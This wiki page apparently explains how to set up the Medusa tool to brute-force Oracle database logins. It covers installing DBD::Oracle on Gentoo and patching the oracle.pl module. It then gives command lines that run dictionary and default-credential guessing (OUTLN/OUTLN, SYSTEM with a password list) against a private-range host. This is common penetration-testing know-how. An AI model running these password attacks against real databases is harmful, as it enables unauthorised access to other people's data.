Medusa

From TheInterW3bs Wiki

Jump to: navigation, search

Using Medusa against Oracle accounts 

# Requires DBD::Oracle
#
# Gentoo Installation Notes
#  [/etc/portage/packages.keywords]
#    app-admin/eselect-oracle ~x86
#    dev-db/oracle-instantclient-basic ~x86
#    dev-db/oracle-instantclient-sqlplus ~x86
#
# g-cpan -i DBD::Oracle
#   If install fails looking *.mk:
#     cd .cpan/build/DBD-Oracle-1.17; su
#     export ORACLE_HOME=/usr/lib/oracle/10.2.0.2/client/lib
#     export LDPATH=/usr/lib/oracle/10.2.0.2/client/lib
#     export C_INCLUDE_PATH=/usr/lib/oracle/10.2.0.2/client/include
#     perl Makefile.PL
#     make install
#     
#     Verify that permissions were set correctly on installed files.

For my machine I did the following 

export ORACLE_HOME=/usr/lib/oracle/10.2.0.3/client
export LD_PATH=/usr/lib/oracle/10.2.0.3/client/lib
export C_INCLUDE_PATH=/usr/lib/oracle/10.2.0.3/client/include/
export LD_LIBRARY_PATH=/usr/lib/oracle/10.2.0.3/client/lib
cd .cpan/build/DBD-Oracle-*
perl Makefile.PL
make install

As of version 1.5 the oracle.pl script needs to be adjusted oracle.pl - modify line 50 to be: 

my $msg = "", $err = 0;

To run Medusa and call the oracle.pl script use the following 

./medusa -M wrapper -h 192.168.0.1 -U /tmp/ora-users.txt -P /tmp/bigdict.txt -t 3 -r 1 -f -F -O /tmp/medusa-oracle-output -v 6 -m TYPE:STDIN -m PROG:/usr/src/compiled/medusa-1.5/lib/medusa/modules/oracle.pl -m ARGS:"%H %U DatabaseSIDnameHere"

or to test specific creds 

./medusa -M wrapper -h 192.168.0.1 -u OUTLN -p OUTLN -m TYPE:STDIN -m PROG:/usr/src/compiled/medusa-1.5/lib/medusa/modules/oracle.pl -m ARGS:"%H %U DatabaseSIDnameHere"



# oracle.pl -h 192.168.0.1 -u foo
#
# medusa -M wrapper -h 192.168.0.1 -u SYSTEM -P passwords.txt -m TYPE:STDIN -m PROG:oracle.pl -m ARGS:"%H %U ORCL"
Retrieved from "http://theinterw3bs.com/wiki/index.php?title=Medusa"
Personal tools